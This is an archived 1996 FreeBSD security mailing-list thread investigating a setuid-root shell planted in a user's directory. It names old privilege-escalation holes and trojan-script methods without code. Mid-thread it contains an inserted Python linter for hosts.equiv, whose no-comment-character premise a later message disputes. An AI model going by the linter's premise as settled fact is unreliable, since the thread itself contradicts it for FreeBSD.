From: -Vince- To: JULIAN Elischer cc: mark@grumble.grondar.za, wilko@yedi.iaf.nl, jkh@time.cdrom.com, guido@gvr.win.tue.nl, hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org, Chad Shackley , jbhunt Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: <199606242059.NAA01968@ref.tfs.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk On Mon, 24 Jun 1996, JULIAN Elischer wrote: > > On Mon, 24 Jun 1996, Mark Murray wrote: > > > > > > > What do you get from strings(1)? (Long shot..) > > > > -rwsr-xr-x 1 root users 278528 Jun 18 04:01 root is from the dir > ^ DUH! > There was also the one that used rdist in daemon mode > to rdist itself a new copy of /etc/passwd (and friends) > > I haven't looked recently to see if that still works for FreeBSD.. > I last looked in 386BSD.. Oh well, I remember in Linux when there was 386 0.1... you can login as a regular user, run vi (elvis) on /etc/passwd and then suspend and then like recover and it would make a copy of /etc/passwd Vince GaiaNet System Administration From owner-freebsd-security Mon Jun 24 16:51:45 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id QAA24450 for security-outgoing; Mon, 24 Jun 1996 16:51:45 -0700 (PDT) Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id QAA24430; Mon, 24 Jun 1996 16:51:39 -0700 (PDT) Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id QAA18004; Mon, 24 Jun 1996 16:51:19 -0700 (PDT) Date: Mon, 24 Jun 1996 16:51:19 -0700 (PDT) 
From: -Vince- To: "Jordan K. Hubbard" cc: Mark Murray , Wilko Bulte , guido@gvr.win.tue.nl, hackers@freebsd.org, security@freebsd.org, ache@freebsd.org, Chad Shackley , jbhunt Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: <13540.835653527@time.cdrom.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Mon, 24 Jun 1996, Jordan K. Hubbard wrote: > If it's setuid root then this whole conversation is somewhat pointless, > no? It's like saying "Somebody can break into my house!" and then > having it pointed out that this isn't all that unusual given that the > perpetrator has a full set of your housekeys and that your wife has been > having an affair with him for months anyway and lets him in after you > leave for work in the morning. :-) Good one Jordan :-) But the thing is how did he get that binary there in the first place since if he can do that here, then he can do that on any machine that he doesn't have group wheel on to gain root access... I'll let John comment on this one :-) Vince System Administration - GaiaNet Corporation > repl: bad addresses: > Mark Murray -- no sub-domain in domain-part of address (@) > > Veggy Vinny wrote: > > > > With a setuid bit? > > > > > > Not too sure... > > > > ls -al will tell you this. Come on :-) > > > > > > Does ktrace(1) give any clues? > > > > > > Nope... :-( > > > > > > > What do you get from strings(1)? (Long shot..) > > > > > > -rwsr-xr-x 1 root users 278528 Jun 18 04:01 root is from the dir > > ^ > > | This is a setuid prog. The program is owned by root, and is > > SETUID, therefore it will run as if it were root. It is > > probably a shell (bash, sh, csh) renamed to root and setuid. > > "chmod 755 root" will cut it down to size. > > > > > listing. as for strings... it's really long... > > > > Try me. Cut out the rubbish and the library crap. 
> > > > > > What other exploration have you done? > > > > > > Not much really..... I do remember seeing someone like hack root > > > using ypwhich and it worked too.... that was on 2.1R... -current seemed > > > to fix it... > > > > M > > -- > > Mark Murray > > 46 Harvey Rd, Claremont, Cape Town 7700, South Africa > > +27 21 61-3768 GMT+0200 > > Finger mark@grondar.za for PGP key > > From owner-freebsd-security Mon Jun 24 16:54:57 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id QAA24652 for security-outgoing; Mon, 24 Jun 1996 16:54:57 -0700 (PDT) Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id QAA24615; Mon, 24 Jun 1996 16:54:47 -0700 (PDT) Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id QAA18594; Mon, 24 Jun 1996 16:54:26 -0700 (PDT) Date: Mon, 24 Jun 1996 16:54:26 -0700 (PDT) 
From: -Vince- To: Matthew Jason White cc: Mark Murray , Wilko Bulte , "Jordan K. Hubbard" , guido@gvr.win.tue.nl, hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org, Chad Shackley , jbhunt Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: <4lnkrxe00YUpQCvVNx@andrew.cmu.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk On Mon, 24 Jun 1996, Matthew Jason White wrote: > Excerpts from freebsd-security: 24-Jun-96 Re: I need help on this one.. > by Mark Murray@grondar.za > > | This is a setuid prog. The program is owned by root, and is > > SETUID, therefore it will run as if it were root. It is > > probably a shell (bash, sh, csh) renamed to root and setuid. > > "chmod 755 root" will cut it down to size. > > I think perhaps a better question to be asking is how this guy got a > suid shell on that system. It could have been a booby-trapped program > that got run as root, but one would hope that such a chintsy method > wouldn't work on most systems. Yeah, that's the real question is like if he can transfer the binary from another machine and have it work... other people can do the same thing and gain access to FreeBSD boxes as root as long as they have a account on that machine... 
Vince GaiaNet - System Administration From owner-freebsd-security Mon Jun 24 16:55:32 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id QAA24737 for security-outgoing; Mon, 24 Jun 1996 16:55:32 -0700 (PDT) Received: from onyx.auscert.org.au (onyx0.auscert.org.au [203.5.112.10]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id QAA24712; Mon, 24 Jun 1996 16:55:23 -0700 (PDT) Received: from amethyst.auscert.org.au (amethyst.auscert.org.au [203.5.112.218]) by onyx.auscert.org.au (8.7.5/8.7.1) with ESMTP id JAA10960; Tue, 25 Jun 1996 09:55:15 +1000 (EST) Received: from localhost (localhost [127.0.0.1]) by amethyst.auscert.org.au (8.7.5/8.7.2) with SMTP id JAA29733; Tue, 25 Jun 1996 09:55:13 +1000 (EST) Message-Id: <199606242355.JAA29733@amethyst.auscert.org.au> X-Authentication-Warning: amethyst.auscert.org.au: Host localhost [127.0.0.1] didn't use HELO protocol X-Mailer: exmh version 1.6.7 5/3/96 To: "Jordan K. Hubbard" Cc: guido@gvr.win.tue.nl (Guido van Rooij), hackers@freebsd.org, security@freebsd.org, ache@freebsd.org Subject: Re: No comment character in hosts.equiv In-Reply-To: Your message of "Sun, 23 Jun 1996 23:29:30 MST." <10326.835597770@time.cdrom.com> Mime-Version: 1.0 Content-Type: application/pgp; format=mime; x-action=signclear; x-originator=720360CD Content-Transfer-Encoding: 7bit Date: Tue, 25 Jun 1996 09:55:12 +1000 
From: Danny Smith
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

-----BEGIN PGP SIGNED MESSAGE-----

Content-Type: text/plain; charset=us-ascii

(Note the change of subject line!)

"Jordan K. Hubbard" writes:
> Hmmm. We have reason to believe that he *didn't* get root (though
> we're still assuming he did, just to be paranoid) and if the mod times
> can be trusted, hosts.equiv hasn't been touched in many months (and
> localhost is commented out).
  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^

There is no comment character in either the hosts.equiv file or the
.rhosts file. Use of this may allow someone to spoof DNS and gain
trusted access. Check out the code relating to calls to ruserok().

This is clearly detailed in the AUSCERT Unix Security Checklist which
can probably be obtained from a mirror site near you (access to the
AUSCERT ftp server has been temporarily restricted due to funding
shortages).

Danny Smith.

==========================================================================
Danny Smith                     | Fax:   +61 7 3365 4477
AUSCERT                         | Phone: +61 7 3365 4417
c/- Prentice Centre             |        (answered during business hours)
The University of Queensland    |        (on call after hours for emergencies)
Qld. 4072.                      |
Australia                       | Internet: auscert@auscert.org.au

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Finger pgp@ftp.auscert.org.au to retrieve AUSCERT's public key

iQCVAwUBMc+3fSh9+71yA2DNAQECawP7B/jmCyZN6NgANUku2wFcnJ+6DyxCPTYP
QsORkyWfs79PKqItgx3XLO4CpBT0YXNUC6Q2TKwopSrj0mn1gX4+zJKGImWGAE0s
5DUM8XBenfU/+rxAltPiFvneORPbTGg9wZaSlAVISuxTJH7T8LghIiPFw58oELcY
WbetUnf1G7w=
=mEVx
-----END PGP SIGNATURE-----

From owner-freebsd-security Mon Jun 24 17:04:32 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id RAA25166 for security-outgoing; Mon, 24 Jun 1996 17:04:32 -0700 (PDT)
Received: from po9.andrew.cmu.edu (PO9.ANDREW.CMU.EDU [128.2.10.109]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id RAA25160; Mon, 24 Jun 1996 17:04:30 -0700 (PDT)
Received: (from postman@localhost) by po9.andrew.cmu.edu (8.7.5/8.7.3) id UAA09427; Mon, 24 Jun 1996 20:04:24 -0400
Received: via switchmail; Mon, 24 Jun 1996 20:04:22 -0400 (EDT)
Received: from unix13.andrew.cmu.edu via qmail ID ; Mon, 24 Jun 1996 20:04:07 -0400 (EDT)
Received: from unix13.andrew.cmu.edu via qmail ID ; Mon, 24 Jun 1996 20:04:06 -0400 (EDT)
Received: from mms.4.60.Jan.26.1995.18.43.47.sun4c.411.EzMail.2.0.CUILIB.3.45.SNAP.NOT.LINKED.unix13.andrew.cmu.edu.sun4c.411 via MS.5.6.unix13.andrew.cmu.edu.sun4c_411; Mon, 24 Jun 1996 20:04:05 -0400 (EDT)
Message-ID: <0lnmnpy00YUp8Ea2EM@andrew.cmu.edu>
Date: Mon, 24 Jun 1996 20:04:05 -0400 (EDT)
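A check for the point Danny raises, added here as an example and not code from AUSCERT, FreeBSD or the thread: read hosts.equiv (or a .rhosts) the way the ruserok() he points at reads it, where every non-blank line is "host [user]" and nothing is a comment, and report the entries an administrator probably believes are disabled. A line written as "#localhost" is a live entry for a host literally named "#localhost", which is why Danny connects it to DNS spoofing. The sample file is constructed, and the function names are this example's own.

```python
"""Lint hosts.equiv / .rhosts with ruserok() semantics: no comment character.

Added example, not AUSCERT or FreeBSD code.  SAMPLE_HOSTS_EQUIV is a
constructed file; line 2 is what someone who thinks '#' is a comment
would write to "disable" the localhost entry.
"""

SAMPLE_HOSTS_EQUIV = """\
trusted.example.org
#localhost
+
-evil.example.org
+@admins
other.example.org alice
lab.example.org +
"""


def parse_entries(text):
    """Yield (lineno, host, user) for every non-blank line.

    There is no comment syntax: a leading '#' is part of the host name,
    exactly as ruserok() would compare it against the peer's DNS name.
    """
    for lineno, raw in enumerate(text.splitlines(), 1):
        parts = raw.split()
        if not parts:
            continue
        yield lineno, parts[0], (parts[1] if len(parts) > 1 else None)


def disabled_entries(text):
    """Entries that look commented out but are active, as (lineno, host) pairs."""
    return [(lineno, host) for lineno, host, _ in parse_entries(text)
            if host.startswith("#")]


def lint_hosts_equiv(text):
    """Return [(lineno, severity, message)] for entries worth a second look."""
    findings = []
    for lineno, host, user in parse_entries(text):
        if host.startswith("#"):
            findings.append((lineno, "HIGH",
                             "%r is not a comment; it is a live entry for a host named %r "
                             "and a spoofed DNS name can match it" % (host, host)))
        if host == "+":
            findings.append((lineno, "HIGH", "'+' trusts every host"
                             + (" and every user" if user == "+" else "")))
        elif user == "+":
            findings.append((lineno, "HIGH",
                             "'+' in the user field trusts every account on %s" % host))
        if host.startswith("+@"):
            findings.append((lineno, "INFO",
                             "netgroup entry %s: check who is in that netgroup" % host))
    return findings


if __name__ == "__main__":
    for lineno, severity, message in lint_hosts_equiv(SAMPLE_HOSTS_EQUIV):
        print("line %d [%s] %s" % (lineno, severity, message))
```

Point it at /etc/hosts.equiv and every ~/.rhosts on the box; the "disabled" entries are the ones to delete outright, since the file has no way to keep them inert.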
From: Matthew Jason White
Subject: Re: I need help on this one - please help me track this guy down!
Cc: hackers@FreeBSD.org, security@FreeBSD.org, Chad Shackley, jbhunt

Excerpts from freebsd-security: 24-Jun-96 Re: I need help on this one..
by -Vince-@mercury.gaianet.
> Yeah, that's the real question is like if he can transfer the
> binary from another machine and have it work... other people can do the
> same thing and gain access to FreeBSD boxes as root as long as they have
> an account on that machine...

That shouldn't be possible. FreeBSD wouldn't allow the transfer program
to assign root ownership to a program unless that program is run as
root. The programs typically run on a FreeBSD system as root do not
assign ownership in this way. This guy must've gotten root some other
way and then created the shell so that he could get root again in the
future.

You probably want to change the security script so that it points out
ALL suid programs in /usr/home, /tmp, /var/tmp and /usr/tmp, or any
other publicly writeable area. Are you running inn1.4 on this system?
If so, you should probably upgrade to inn-1.4uoff4 (this port should
prolly be upgraded, if someone hasn't already).

-Matt

-----
Matt White                    Email: mwhite+@cmu.edu
http://www.cs.cmu.edu/afs/cs/user/mwhite/www/

From owner-freebsd-security  Mon Jun 24 17:11:02 1996
To: -Vince-
cc: Matthew Jason White, Mark Murray, Wilko Bulte, "Jordan K. Hubbard", guido@gvr.win.tue.nl, hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org, Chad Shackley, jbhunt
Subject: Re: I need help on this one - please help me track this guy down!
In-reply-to: Your message of "Mon, 24 Jun 1996 16:54:26 PDT."
Date: Mon, 24 Jun 1996 17:09:48 -0700
Message-ID: <1092.835661388@critter.tfs.com>
From: Poul-Henning Kamp

> Yeah, that's the real question is like if he can transfer the
> binary from another machine and have it work... other people can do the
> same thing and gain access to FreeBSD boxes as root as long as they have
> an account on that machine...

The binary is an ordinary shell with a setuid bit.

--
Poul-Henning Kamp           | phk@FreeBSD.ORG       FreeBSD Core-team.
http://www.freebsd.org/~phk | phk@login.dknet.dk    Private mailbox.
whois: [PHK]                | phk@ref.tfs.com       TRW Financial Systems, Inc.
Future will arrive by its own means, progress not so.

From owner-freebsd-security  Mon Jun 24 17:14:30 1996
Date: Mon, 24 Jun 1996 17:14:07 -0700 (PDT)
From: -Vince-
To: Poul-Henning Kamp
cc: Matthew Jason White, Mark Murray, Wilko Bulte, "Jordan K. Hubbard", guido@gvr.win.tue.nl, hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org, Chad Shackley, jbhunt
Subject: Re: I need help on this one - please help me track this guy down!
In-Reply-To: <1092.835661388@critter.tfs.com>

On Mon, 24 Jun 1996, Poul-Henning Kamp wrote:

> > Yeah, that's the real question is like if he can transfer the
> > binary from another machine and have it work... other people can do the
> > same thing and gain access to FreeBSD boxes as root as long as they have
> > an account on that machine...
>
> The binary is an ordinary shell with a setuid bit.

Hmmm, how did they get the file into their account with the setuid bit?

Vince

From owner-freebsd-security  Mon Jun 24 17:21:01 1996
To: -Vince-
cc: hackers@FreeBSD.ORG, security@FreeBSD.ORG
From: "Gary Palmer"
Subject: Re: I need help on this one - please help me track this guy down!
In-reply-to: Your message of "Mon, 24 Jun 1996 16:54:26 PDT."
Date: Tue, 25 Jun 1996 01:18:45 +0100
Message-ID: <27780.835661925@palmer.demon.co.uk>

[ CC: Trimmed ]

> Yeah, that's the real question is like if he can transfer the
> binary from another machine and have it work... other people can do the
> same thing and gain access to FreeBSD boxes as root as long as they have
> an account on that machine...

Sort of. You need root access in the first place to create a suid root
shell... It could be an old exploit that is now closed (like the
mount_union loophole)...

Gary
--
Gary Palmer                                          FreeBSD Core Team Member
FreeBSD: Turning PC's into workstations. See http://www.FreeBSD.ORG/ for info

From owner-freebsd-security  Mon Jun 24 17:26:57 1996
Date: Mon, 24 Jun 1996 17:26:35 -0700 (PDT)
From: -Vince-
To: Matthew Jason White
cc: hackers@FreeBSD.org, security@FreeBSD.org, Chad Shackley, jbhunt
Subject: Re: I need help on this one - please help me track this guy down!
In-Reply-To: <0lnmnpy00YUp8Ea2EM@andrew.cmu.edu>

On Mon, 24 Jun 1996, Matthew Jason White wrote:

> Excerpts from freebsd-security: 24-Jun-96 Re: I need help on this one..
> by -Vince-@mercury.gaianet.
> > Yeah, that's the real question is like if he can transfer the
> > binary from another machine and have it work... other people can do the
> > same thing and gain access to FreeBSD boxes as root as long as they have
> > an account on that machine...
>
> That shouldn't be possible. FreeBSD wouldn't allow the transfer program
> to assign root ownership to a program unless that program is run as
> root. The programs typically run on a FreeBSD system as root do not
> assign ownership in this way. This guy must've gotten root some other
> way and then created the shell so that he could get root again in the
> future.

Yeah, that's what I'm thinking... Since it seems like there was a problem
of running ypwhich to get root on another machine running 2.1R but in
-current, it doesn't work.

> You probably want to change the security script so that it points out
> ALL suid programs in /usr/home, /tmp, /var/tmp and /usr/tmp, or any
> other publicly writeable area. Are you running inn1.4 on this system?
> If so, you should probably upgrade to inn-1.4uoff4 (this port should
> prolly be upgraded, if someone hasn't already).

Hmmm, we're not running inn at all...
Vince

From owner-freebsd-security  Mon Jun 24 17:29:06 1996
Date: Mon, 24 Jun 1996 17:28:45 -0700 (PDT)
From: -Vince-
To: Gary Palmer
cc: hackers@FreeBSD.ORG, security@FreeBSD.ORG, Chad Shackley, jbhunt
Subject: Re: I need help on this one - please help me track this guy down!
In-Reply-To: <27780.835661925@palmer.demon.co.uk>

On Tue, 25 Jun 1996, Gary Palmer wrote:

> [ CC: Trimmed ]
>
> > Yeah, that's the real question is like if he can transfer the
> > binary from another machine and have it work... other people can do the
> > same thing and gain access to FreeBSD boxes as root as long as they have
> > an account on that machine...
>
> Sort of. You need root access in the first place to create a suid root
> shell... It could be an old exploit that is now closed (like the
> mount_union loophole)...

Yeah, I was thinking you do need to be root in the first place to do it.
I think this guy got an account after the mount_union loophole since we're
running -current and -current did fix the security problems...

Vince

From owner-freebsd-security  Mon Jun 24 17:51:38 1996
From: Michael Smith
Message-Id: <199606250125.KAA25110@genesis.atrad.adelaide.edu.au>
Subject: Re: I need help on this one - please help me track this guy down!
To: mark@grumble.grondar.za.@grondar.za (Mark Murray)
Date: Tue, 25 Jun 1996 10:55:43 +0930 (CST)
Cc: richardc@CSUA.Berkeley.EDU, mark@grumble.grondar.za, wilko@yedi.iaf.nl, jkh@time.cdrom.com, guido@gvr.win.tue.nl, hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org
In-Reply-To: <199606242043.WAA06435@grumble.grondar.za> from "Mark Murray" at Jun 24, 96 10:43:36 pm

Mark Murray stands accused of saying:
> > > > -rwsr-xr-x  1 root  users  278528 Jun 18 04:01 root   is from the dir
>            ^
>            | This is a setuid prog. The program is owned by root, and is
> SETUID, therefore it will run as if it were root. It is
> probably a shell (bash, sh, csh) renamed to root and setuid.
> "chmod 755 root" will cut it down to size.

lovely:~>ls -l /bin/sh
-r-xr-xr-x  1 bin  bin  278528 Jun 19 20:34 /bin/sh

The question is, of course, what a setuid-root copy of /bin/sh is doing
in this user's home directory. Have you fixed the 'modload' hole on this
system yet?

> Mark Murray

--
]] Mike Smith, Software Engineer        msmith@atrad.adelaide.edu.au    [[
]] Genesis Software                     genesis@atrad.adelaide.edu.au   [[
]] High-speed data acquisition and      (GSM mobile) 0411-222-496       [[
]] realtime instrument control          (ph/fax)  +61-8-267-3039        [[
]] Collector of old Unix hardware.      "Where are your PEZ?" The Tick  [[

From owner-freebsd-security  Mon Jun 24 18:08:55 1996
Date: Mon, 24 Jun 1996 18:07:00 -0700 (PDT)
From: -Vince-
To: Michael Smith
cc: mark@grumble.grondar.za, wilko@yedi.iaf.nl, jkh@time.cdrom.com, guido@gvr.win.tue.nl, hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org, jbhunt, Chad Shackley
Subject: Re: I need help on this one - please help me track this guy down!
In-Reply-To: <199606250125.KAA25110@genesis.atrad.adelaide.edu.au>

On Tue, 25 Jun 1996, Michael Smith wrote:

> Mark Murray stands accused of saying:
> > > > > -rwsr-xr-x  1 root  users  278528 Jun 18 04:01 root   is from the dir
> >            ^
> >            | This is a setuid prog. The program is owned by root, and is
> > SETUID, therefore it will run as if it were root. It is
> > probably a shell (bash, sh, csh) renamed to root and setuid.
> > "chmod 755 root" will cut it down to size.
>
> lovely:~>ls -l /bin/sh
> -r-xr-xr-x  1 bin  bin  278528 Jun 19 20:34 /bin/sh
>
> The question is, of course, what a setuid-root copy of /bin/sh is doing
> in this user's home directory. Have you fixed the 'modload' hole on this
> system yet?

Yeah, the modload hole was fixed a long time ago as well as the man
hole... Getting /bin/sh with setuid-root is the really strange part..
Vince

From owner-freebsd-security  Mon Jun 24 19:23:35 1996
Date: Mon, 24 Jun 1996 21:22:55 -0500 (EST)
From: John Fieber
To: -Vince-
cc: "Jordan K. Hubbard", Mark Murray, Wilko Bulte, guido@gvr.win.tue.nl, hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org, Chad Shackley, jbhunt
Subject: Re: I need help on this one - please help me track this guy down!

On Mon, 24 Jun 1996, -Vince- wrote:

> Good one Jordan :-) But the thing is how did he get that binary there
> in the first place since if he can do that here, then he can do that on any
> machine that he doesn't have group wheel on to gain root access... I'll

Um, have people forgotten about the nifty little mount trick that
used to be a FreeBSD feature? You would only need to use it once
to install your root command.

-john

== jfieber@indiana.edu ===========================================
== http://fallout.campusview.indiana.edu/~jfieber ================

From owner-freebsd-security  Mon Jun 24 19:42:21 1996
Date: Mon, 24 Jun 1996 19:41:43 -0700 (PDT)
From: -Vince-
To: John Fieber
cc: hackers@FreeBSD.org, security@FreeBSD.org, Chad Shackley, jbhunt
Subject: Re: I need help on this one - please help me track this guy down!

On Mon, 24 Jun 1996, John Fieber wrote:

> On Mon, 24 Jun 1996, -Vince- wrote:
>
> > Good one Jordan :-) But the thing is how did he get that binary there
> > in the first place since if he can do that here, then he can do that on any
> > machine that he doesn't have group wheel on to gain root access... I'll
>
> Um, have people forgotten about the nifty little mount trick that
> used to be a FreeBSD feature? You would only need to use it once
> to install your root command.

Nah, that isn't it since we're running -current and I fixed that
problem when it was announced..... both the man and the mount_union hole...

Vince

From owner-freebsd-security  Mon Jun 24 19:49:10 1996
Date: Tue, 25 Jun 1996 10:48:40 +0800 (SST)
From: Ng Pheng Siong
To: -Vince-
cc: John Fieber, hackers@FreeBSD.ORG, security@FreeBSD.ORG, Chad Shackley, jbhunt
Subject: Re: I need help on this one - please help me track this guy down!

On Mon, 24 Jun 1996, -Vince- wrote:

> Nah, that isn't it since we're running -current and I fixed that
> problem when it was announced..... both the man and the mount_union hole...

I suppose you've walked your filesystems for setuid programs?

- PS
--
Ng Pheng Siong            * Finger for PGP key.
Pacific Internet Pte Ltd  * Singapore
Fast, secure, cheap. Pick two.

From owner-freebsd-security  Mon Jun 24 19:50:03 1996
Date: Mon, 24 Jun 1996 19:49:30 -0700 (PDT)
From: -Vince-
To: Ng Pheng Siong
cc: John Fieber, hackers@FreeBSD.ORG, security@FreeBSD.ORG, Chad Shackley, jbhunt
Subject: Re: I need help on this one - please help me track this guy down!

On Tue, 25 Jun 1996, Ng Pheng Siong wrote:

> On Mon, 24 Jun 1996, -Vince- wrote:
> > Nah, that isn't it since we're running -current and I fixed that
> > problem when it was announced..... both the man and the mount_union hole...
>
> I suppose you've walked your filesystems for setuid programs?

Yep... did that...

Vince

From owner-freebsd-security  Mon Jun 24 23:13:10 1996
Message-Id: <199606250611.IAA07772@grumble.grondar.za>
To: -Vince-
cc: hackers@freebsd.org, security@freebsd.org
Subject: Re: I need help on this one - please help me track this guy down!
Date: Tue, 25 Jun 1996 08:11:25 +0200
From: Mark Murray

[cc: trimmed]

-Vince- wrote:
> > Try me. Cut out the rubbish and the library crap.
>
> Well, it's actually easier to mail you the binary...

Please do, or FTP it to ftp.grondar.za:/incoming.

M
--
Mark Murray
46 Harvey Rd, Claremont, Cape Town 7700, South Africa
+27 21 61-3768 GMT+0200
Finger mark@grondar.za for PGP key

From owner-freebsd-security  Mon Jun 24 23:26:58 1996
Date: Mon, 24 Jun 1996 23:25:29 -0700 (PDT)
From: -Vince-
To: Mark Murray
cc: hackers@freebsd.org, security@freebsd.org, Chad Shackley, jbhunt
Subject: Re: I need help on this one - please help me track this guy down!
In-Reply-To: <199606250611.IAA07772@grumble.grondar.za>

On Tue, 25 Jun 1996, Mark Murray wrote:

> [cc: trimmed]
>
> -Vince- wrote:
> > > Try me. Cut out the rubbish and the library crap.
> >
> > Well, it's actually easier to mail you the binary...
>
> Please do, or FTP it to ftp.grondar.za:/incoming.

Think the problem is solved already but I'll mail you the binary..

Cheers,
-Vince-
richardc@CSUA.Berkeley.EDU - vince@COSC.GOV - vince@cygnus.sy.yale.edu
GUS Mailing Lists Admin - http://www.COSC.GOV/~vince
UC Berkeley AstroPhysics (B.S.) - Electrical Engineering (Honorary B.S.)
Chabot Observatory & Science Center - Oakland, California USA
Computing Networking Operations - Advisory Council Member
Running FreeBSD - Real UN*X for Free!
Linda Wong/Vivian Chow/Hacken Lee/Danny Chan/Priscilla Chan Fan Club Mailing Lists Admin
1996 Estoril Blue BMW ///M3 - BMW CCA Member Golden Gate Chapter

From owner-freebsd-security  Mon Jun 24 23:30:32 1996
Message-Id: <199606250625.IAA07815@grumble.grondar.za>
To: -Vince-
cc: Matthew Jason White, Mark Murray, Wilko Bulte, "Jordan K. Hubbard", guido@gvr.win.tue.nl, hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org, Chad Shackley, jbhunt
Subject: Re: I need help on this one - please help me track this guy down!
Date: Tue, 25 Jun 1996 08:25:10 +0200
From: Mark Murray

-Vince- wrote:
> > I think perhaps a better question to be asking is how this guy got a
> > suid shell on that system. It could have been a booby-trapped program
> > that got run as root, but one would hope that such a chintzy method
> > wouldn't work on most systems.
>
> Yeah, that's the real question is like if he can transfer the
> binary from another machine and have it work... other people can do the
> same thing and gain access to FreeBSD boxes as root as long as they have
> an account on that machine...

I must be a little harsh here, but I'll be diplomatic, OK? :-)

You didn't know it was a setuid file, in fact you seemed not to know
what a setuid file was. (Am I correct?) If someone has root on your
machine, which he will have if he has a setuid shell, he has the
ability to compromise your whole (possibly weakly set up) network.

If you do not know the basics, like setuid, you are WIDE open for this
kind of attack.

This shell could have been created two ways (that are currently in
popular cracker use):

1) The cracker snooped your root password somehow, (digging through
   your desk/dustbin or by running a snooper somewhere), then created
   this suid shell for future use.

2) The cracker made a trojan script somewhere (usually exploiting
   some admins (roots) who have "." in their path). This way he creates
   a script that when run as root will make him a suid program.
   After this he has you by tender bits.

There are other ways, but these are the most popular.

For much more info, I recommend "Practical Unix Security" from
O'Reilly and Associates, (by Garfinkel?)
M
--
Mark Murray
46 Harvey Rd, Claremont, Cape Town 7700, South Africa
+27 21 61-3768 GMT+0200
Finger mark@grondar.za for PGP key

From owner-freebsd-security  Mon Jun 24 23:33:37 1996
Date: Mon, 24 Jun 1996 23:32:55 -0700 (PDT)
From: -Vince-
To: Mark Murray
cc: hackers@FreeBSD.org, security@FreeBSD.org, Chad Shackley, jbhunt
Subject: Re: I need help on this one - please help me track this guy down!
In-Reply-To: <199606250625.IAA07815@grumble.grondar.za>

On Tue, 25 Jun 1996, Mark Murray wrote:

> -Vince- wrote:
> > > I think perhaps a better question to be asking is how this guy got a
> > > suid shell on that system. It could have been a booby-trapped program
> > > that got run as root, but one would hope that such a chintzy method
> > > wouldn't work on most systems.
> >
> > Yeah, that's the real question is like if he can transfer the
> > binary from another machine and have it work... other people can do the
> > same thing and gain access to FreeBSD boxes as root as long as they have
> > an account on that machine...
>
> I must be a little harsh here, but I'll be diplomatic, OK? :-)
>
> You didn't know it was a setuid file, in fact you seemed not to know
> what a setuid file was. (Am I correct?) If someone has root on your
> machine, which he will have if he has a setuid shell, he has the
> ability to compromise your whole (possibly weakly set up) network.
>
> If you do not know the basics, like setuid, you are WIDE open for this
> kind of attack.

Well, I know what a setuid is but didn't know it was called a setuid
since it has that s in the permissions... Also, on our machine, the wheel
group only has chad, jbhunt, vince and root and the only person who can
login to root directly is chad at the console, we all need to su.

> This shell could have been created two ways (that are currently in
> popular cracker use):
>
> 1) The cracker snooped your root password somehow, (digging through
>    your desk/dustbin or by running a snooper somewhere), then created
>    this suid shell for future use.
This isn't possible since Gaianet isn't open to the public for
people to snoop around.

> 2) The cracker made a trojan script somewhere (usually exploiting
>    some admins (roots) who have "." in their path). This way he creates
>    a script that when run as root will make him a suid program.
>    After this he has you by tender bits.

Hmmm, doesn't everyone have . as their path since all . does is allow
someone to run stuff from the current directory...

> There are other ways, but these are the most popular.
>
> For much more info, I recommend "Practical Unix Security" from
> O'Reilly and Associates, (by Garfinkel?)

I have that book but there are always ways no one knows about ;)

Vince

From owner-freebsd-security  Mon Jun 24 23:36:49 1996
From: guido@gvr.win.tue.nl (Guido van Rooij)
Message-Id: <199606250636.IAA18992@gvr.win.tue.nl>
Subject: Re: No comment character in hosts.equiv
To: danny@auscert.org.au (Danny Smith)
Date: Tue, 25 Jun 1996 08:36:16 +0200 (MET DST)
Cc: jkh@time.cdrom.com, hackers@freebsd.org, security@freebsd.org, ache@freebsd.org
In-Reply-To: <199606242355.JAA29733@amethyst.auscert.org.au> from Danny Smith at "Jun 25, 96 09:55:12 am"

Danny Smith wrote:
-- Start of PGP encoded section.
> (Note the change of subject line!)
>
> "Jordan K. Hubbard" writes:
>
> > Hmmm. We have reason to believe that he *didn't* get root (though
> > we're still assuming he did, just to be paranoid) and if the mod times
> > can be trusted, hosts.equiv hasn't been touched in many months (and
> > localhost is commented out).
>   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>
> There is no comment character in either the hosts.equiv file or the
> .rhosts file. Use of this may allow someone to spoof DNS and gain
> trusted access.
>
> Check out the code relating to calls to ruserok().

Wrong. FreeBSD has a comment char. Put in before the release of 2.1.0.
Look in usr/src/lib/libc/net/rcmd.c in __ivaliduser.
-Guido

